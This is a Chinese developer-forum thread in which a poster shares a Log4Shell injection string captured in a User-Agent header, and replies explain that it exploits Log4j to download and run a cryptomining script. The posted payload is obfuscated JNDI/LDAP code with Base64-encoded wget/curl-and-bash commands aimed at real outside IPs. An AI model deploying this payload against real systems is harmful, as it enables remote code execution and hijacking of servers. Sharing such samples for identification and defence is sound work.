User-Agent 注入

2022-02-10 10:13:48 +08:00
 kaka6

年前部署一个接口服务,通过日志,最近发现经常有 User-Agent 异常注入的访问 其中一个比较诡异的内容:

t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//150.136.111.68:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L2ludGVsLnNoOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvaW50ZWwuc2g7IGJhc2ggaW50ZWwuc2ggNDY4cllRTXhuQ3YzWG9GclhmNWkyUWU5eVpyelZTZGdNV2hqaVAyNjRUQWdKNXc0WGU2UGlKdGFGRjc5amhlNWFIaG1rdVNGOEttc0xkczRyN0hNRHhDelJLbU1UN3o=}')

知道这是干嘛的吗

3526 次点击
所在节点    程序员
11 条回复
ThirdFlame
2022-02-10 10:15:25 +08:00
log4shell
silverfox
2022-02-10 10:21:03 +08:00
zhazi
2022-02-10 10:22:30 +08:00
maichaide
2022-02-10 11:03:53 +08:00
下载脚本开启探矿服务
muzuiget
2022-02-10 13:28:35 +08:00
Log4j 漏洞,就是赌你用 Log4j 把 UserAgent 记录到日志中,实现远程执行代码。
yundun2021
2022-02-10 13:34:59 +08:00
有条件可以上 WAF
yu1u
2022-02-10 13:47:12 +08:00
log4j 漏洞攻击
0x73346b757234
2022-02-10 18:04:25 +08:00
对面想通过 Log4j 漏洞下载 xmrig 挖矿脚本。多谢老哥提供了个样本,测了下自己的规则能覆盖,嘿嘿。
kaka6
2022-02-10 22:29:21 +08:00
@muzuiget 没有用 Log4j 就没事是吧,我是用 python 的 user_agents 记录
muzuiget
2022-02-10 23:18:08 +08:00
@kaka6 没用 Java 肯定没事,对方就是随机扫的。
kaka6
2022-02-17 09:33:19 +08:00
又收到不少的 User-Agent:
Go-http-client/1.1
python-requests/2.20.1
curl/7.75.0

而且还来自世界各地,以前没做这么细的记录,现在全网做记录,发现了不少莫明访客

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/832843

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX